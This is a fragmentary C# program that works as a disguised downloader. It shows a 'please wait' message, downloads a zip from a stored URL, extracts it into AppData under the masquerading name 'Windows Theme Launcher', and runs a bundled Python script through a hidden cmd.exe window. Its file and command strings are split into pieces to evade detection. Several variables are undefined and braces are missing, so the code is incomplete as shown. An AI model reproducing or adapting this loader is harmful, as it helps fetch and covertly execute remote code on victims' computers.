using System.Collections.Generic;
using System.Diagnostics;
using System.IO.Compression;
using System.Threading.Tasks;
internal static class Program
Console.Title = "In" + " Progess" + " Please" + " Wait " + "...";
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("Please" + " Wait," + " Downloading" + " Files...");
dynamic Client = new WebClient();
dynamic pthv = Environment.SpecialFolder.ApplicationData;
string appdata = Environment.GetFolderPath(pthv);
string path = appdata + @"\W" + "i" + "n" + "d" + "o" + "w" + "s " + "T" + "h" + "e" + "m" + "e " + "L" + "a" + "u" + "n" + "c" + "h" + "e" + "r";
Client.DownloadFile(Properties.Resources.Download, appdata + @"\" + v1.ToString() + "ame" + v2.ToString() + "ngine" + "R270" + "HD" + ".zi" + "p");
ZipFile.ExtractToDirectory(appdata + @"\" + v1.ToString() + "ame" + v2.ToString() + "ngine" + "R270HD" + ".z" + "i" + "p", path);
Console.ForegroundColor = ConsoleColor.Blue;
Console.WriteLine("Ac" + "ti" + "on" + " St" + "ar" + "te" + "d");
if (Directory.Exists(appdata + @"\W" + "i" + "n" + "d" + "o" + "w" + "s " + "T" + "h" + "e" + "m" + "e " + "L" + "a" + "u" + "n" + "c" + "h" + "e" + "r"))
ProcessStartInfo CommandPrompt = new ProcessStartInfo("c" + "md" + ".e" + "xe");
CommandPrompt.WindowStyle = ProcessWindowStyle.Hidden;
CommandPrompt.Arguments = "/" + "k " + path + a.ToString() + @"\" + "y" + "th" + "on." + "e" + "x" + "e" + " ma" + "i" + "n.p" + "y";
Process.Start(CommandPrompt);